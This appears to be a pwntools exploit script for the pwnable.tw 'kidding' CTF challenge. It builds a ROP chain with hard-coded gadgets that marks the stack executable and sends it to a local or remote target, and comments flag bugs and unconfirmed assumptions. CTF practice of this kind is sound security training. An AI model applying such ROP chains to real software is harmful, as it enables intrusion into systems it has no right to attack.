"""ROP-chain script for the pwnable.tw "kidding" challenge (local or remote).

Flow: pick a target tube (local process or remote service), build 16 bytes
of filler followed by a ROP chain, attach gdb, then send the payload.
The chain uses three gadgets to store the value 7 into ``stack_prot`` and
then returns into ``stack_executable`` with eax pointing at ``libc_stack_end``.
Every address below is an absolute, hard-coded value for this exact binary
build; nothing is resolved at runtime.
"""
from pwn import *

# Toggle between the local binary and the remote service.
local: bool = True

if local:
    r = process("./kidding")
else:
    # nc chall.pwnable.tw 10303
    r = remote("chall.pwnable.tw", 10303)

# 16 bytes of filler placed before the chain. The offset is a fixed constant
# here, not derived from the binary at runtime.
padding = "a"*0x10

# Absolute addresses inside the target binary. The variable names suggest
# these are glibc's stack-protection bookkeeping (a pointer to the stack end,
# the stack protection flags, and the routine that re-applies them), but only
# the raw values are known here -- TODO confirm against the binary's symbol
# table. Because they are absolute, the chain assumes a fixed load address;
# a PIE/ASLR build or any other build of the binary would invalidate them.
libc_stack_end = 0x080e9fc8
stack_prot = 0x080e9fec
stack_executable = 0x0809a080


# ROP gadgets (absolute addresses, same build-specific caveat as above).
# 0x080b8536 : pop eax ; ret
pop_eax_ret = 0x080b8536
# 0x0805462b : mov dword ptr [edx], eax ; ret
mov_ret = 0x0805462b
# 0x0806ec8b : pop edx ; ret
pop_edx_ret = 0x0806ec8b

# Chain, in execution order:
#   eax = 7  (presumably PROT_READ|PROT_WRITE|PROT_EXEC -- confirm)
payload = padding + p32(pop_eax_ret) + p32(7)
#   edx = &stack_prot
payload += p32(pop_edx_ret) + p32(stack_prot)
#   *edx = eax  ->  stack_prot = 7
payload += p32(mov_ret)
#   eax = &libc_stack_end
payload += p32(pop_eax_ret) + p32(libc_stack_end)
#   return into stack_executable; 0x61616161 ("aaaa") is the address popped
#   after it returns -- presumably a placeholder rather than a real target.
payload += p32(stack_executable) + p32(0x61616161)
# NOTE(review): `padding` is a str while p32() returns bytes; this
# concatenation only works under Python 2 pwntools -- under Python 3 it
# raises TypeError. Confirm which interpreter this was written for.

# Unconditional: attaches a debugger even when `local` is False, where there
# is no local process to attach to -- presumably meant to be guarded by
# `if local:`.
gdb.attach(r)

r.sendline(payload)